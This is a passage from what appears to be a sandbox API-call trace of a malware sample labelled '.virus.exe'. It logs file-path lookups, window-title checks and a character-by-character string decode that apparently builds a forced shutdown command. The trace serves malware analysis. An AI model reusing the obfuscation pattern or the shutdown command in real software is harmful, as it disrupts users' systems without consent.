This=0xf2d694, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0179.682] FileSystemObject:IDispatch:Invoke (in: This=0xf2d694, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0179.684] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0179.684] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="exe", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0179.684] CharUpperBuffW (in: lpsz="exe", cchLength=0x4 | out: lpsz="EXE") returned 0x4 [0179.684] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0179.685] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 1 [0179.685] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x1, lParam=0x28f54c) returned 0x0 [0179.685] IsWindow (hWnd=0x103bc) returned 1 [0179.685] GetWindowLongA (hWnd=0x103bc, nIndex=-16) returned 1140916224 [0179.685] IsIconic (hWnd=0x103b8) returned 0 [0179.685] GetParent (hWnd=0x103bc) returned 0x103b8 [0179.686] TranslateMessage (lpMsg=0x28f5e8) returned 0 [0179.686] DispatchMessageA (lpMsg=0x28f5e8) returned 0x0 [0179.686] KillTimer (hWnd=0x103bc, uIDEvent=0x103bc) returned 1 [0179.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.687] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0179.687] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.687] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0179.687] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.688] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0179.688] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.689] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.689] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.689] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0179.689] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.690] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0179.690] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.691] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0179.691] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.692] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0179.692] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.693] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.693] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.693] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.694] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.694] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0179.694] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.695] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.695] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.696] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.696] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.700] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0179.700] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.701] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.701] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.701] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.702] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.702] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.702] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.703] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.703] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.704] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.716] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.717] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.717] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0179.718] GetForegroundWindow () returned 0x1011a [0179.718] GetLastError () returned 0x0 [0179.718] SysStringLen (param_1=" ") returned 0xff [0179.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0179.718] SysStringLen (param_1=" ") returned 0xff [0179.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0179.718] GetWindowTextA (in: hWnd=0x1011a, lpString=0x11644c4, nMaxCount=255 | out: lpString="FolderView") returned 10 [0179.719] GetLastError () returned 0x0 [0179.719] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0179.719] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="FolderView") returned 256 [0179.719] SysStringLen (param_1="Fo") returned 0x2 [0179.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Fo", cchWideChar=3, lpMultiByteStr=0x11684fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fo", lpUsedDefaultChar=0x0) returned 3 [0179.720] SetWindowTextA (hWnd=0x103c4, lpString="Fo") returned 1 [0179.720] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0179.720] GetFocus () returned 0x0 [0179.720] lstrlenA (lpString="Fo") returned 2 [0179.720] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0179.720] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=3 | out: lpString="Pr") returned 2 [0179.720] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0179.721] GetFocus () returned 0x0 [0179.721] lstrcmpA (lpString1="Pr", lpString2="Fo") returned 1 [0179.721] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0179.721] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11684fc) returned 0x1 [0179.721] IsWindow (hWnd=0x103c4) returned 1 [0179.721] IsWindow (hWnd=0x103c4) returned 1 [0179.722] IsWindow (hWnd=0x103c4) returned 1 [0179.722] IsWindow (hWnd=0x103c4) returned 1 [0179.722] GetFocus () returned 0x0 [0179.722] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0179.723] GetFocus () returned 0x0 [0179.723] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0179.723] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0179.723] GetFocus () returned 0x0 [0179.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Fo", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0179.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Fo", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=3 | out: lpWideCharStr="Fo") returned 3 [0179.723] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0179.723] VarBstrCmp (bstrLeft="Fo", bstrRight="S ", lcid=0x0, dwFlags=0x30001) returned 0x0 [0179.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.724] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0179.724] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.725] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0179.725] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.726] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0179.726] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.726] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0179.727] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.727] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0179.777] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, 